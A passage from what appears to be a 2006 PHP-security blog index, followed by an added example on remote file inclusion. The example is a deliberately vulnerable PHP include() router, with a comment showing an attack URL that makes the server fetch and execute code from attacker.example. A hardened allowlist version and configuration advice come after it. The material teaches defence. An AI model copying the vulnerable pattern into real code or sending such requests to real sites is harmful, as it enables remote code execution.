OSCON 2006 – See you there!

Just a quick note as to the quietness of the blog. I’m working on a few things: my slides for OSCON (the webappsec 150 tutorial, and updating my Ajax presentation to include the latest research and make it a bit more (ahem) controversial to liven things up), doing demos for the above, my slides for OWASP […]

PHP Security Architecture: SABSA approach

There are only a few acknowledged industry security architectures. SABSA (best documented in Enterprise Security Architecture by Sherwood, Clark and Lynas) is probably the best known. The various artifacts from this architecture include: Each of these layers needs to be thought about in a considered way: (Business) Drivers: Why do you want X / How […]

PHP Security Architecture – Contextual Overview

Overview

The problem with PHP is that it has no security architecture. What do I mean by security architecture? A single pervasive vision for security, which will last for approximately five years with little or no design maintenance. A robust security architecture creates a balance between functionality and risk, and ensures that by default, simple […]

PHP Insecurity: Failure of Leadership

About a week or so ago, I wrote to webappsec in response to Yasuo Ohgaki’s (書かない日記) post about some issues with PHP’s security model. For some time, I’ve been worried about the direction of PHP. As many of you know, I helped write XMB Forum and now help write UltimaBB. XMB in particular is an […]

PHP Insecurity: File handling and remote code execution

One of the reasons that PHP applications feature so prominently on bugtraq is not particularly developer-focused: it is PHP’s fault. Today we look at the top reason: the semi-hidden world of allow_url_fopen, stream wrappers and pretty much every file-oriented function. The extraordinarily bad decision to make allow_url_fopen the default AND to let a host of functions (include and require among them) automatically “benefit” from it causes the #1 security defect of 2005: remote file inclusion. Read on for this rant. Warning: no solutions contained within.
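The mechanism the rant describes, as an added example that is not part of the original post or of any of the author’s projects: a typical page router written the way many 2005-era PHP applications were, beside a hardened form that does not depend on the ini settings. The `pages/` directory, the `page` parameter and the helper names are assumptions made for the illustration; the code targets PHP 7.1 or later.

```php
<?php
// Added example, not from the original post. Assumes the script is
// reached as /index.php?page=<name> and that a hypothetical pages/
// directory holds home.php, about.php and contact.php.

// --- Vulnerable form -------------------------------------------------
// With allow_url_fopen=On (the historical default) and, on PHP >= 5.2,
// allow_url_include=On, include() resolves its argument through PHP's
// stream wrappers (http://, ftp://, ...). A request such as
//   /index.php?page=http://attacker.example/shell
// makes include() fetch http://attacker.example/shell.php over the
// network and execute whatever the attacker's server returns.
function render_page_vulnerable(string $page): void
{
    include $page . '.php';            // attacker-controlled path
}

// --- Hardened form ---------------------------------------------------
// Map the request parameter onto a fixed allowlist and never build a
// filesystem path from user input. This is safe whatever the ini says.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(string $page): ?string
{
    return PAGES[$page] ?? null;       // unknown name -> null, never a path
}

function render_page_hardened(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include __DIR__ . '/' . $file;     // only paths from the allowlist
}

// Belt and braces: report whether the URL wrappers are switched off.
// allow_url_include only exists from PHP 5.2; ini_get() returns false for
// an unknown directive, which FILTER_VALIDATE_BOOLEAN treats as false.
function url_wrappers_disabled(): bool
{
    $fopen   = filter_var(ini_get('allow_url_fopen'),   FILTER_VALIDATE_BOOLEAN);
    $include = filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
    return !$fopen && !$include;
}

if (PHP_SAPI !== 'cli') {
    render_page_hardened($_GET['page'] ?? 'home');
}
```

To see the setting the rant is about on a given host, run `php -i | grep allow_url`; `allow_url_fopen => On` is what makes the vulnerable router exploitable, and turning it (and, on PHP 5.2 and later, `allow_url_include`) to `Off` in php.ini removes the network wrappers from include(). The allowlist is the real fix, though: it holds even on hosts where you cannot touch php.ini, and it also closes the local variants of the same bug (`../` traversal and, on later PHP versions, the `data:` and `php://input` wrappers that `allow_url_include` governs).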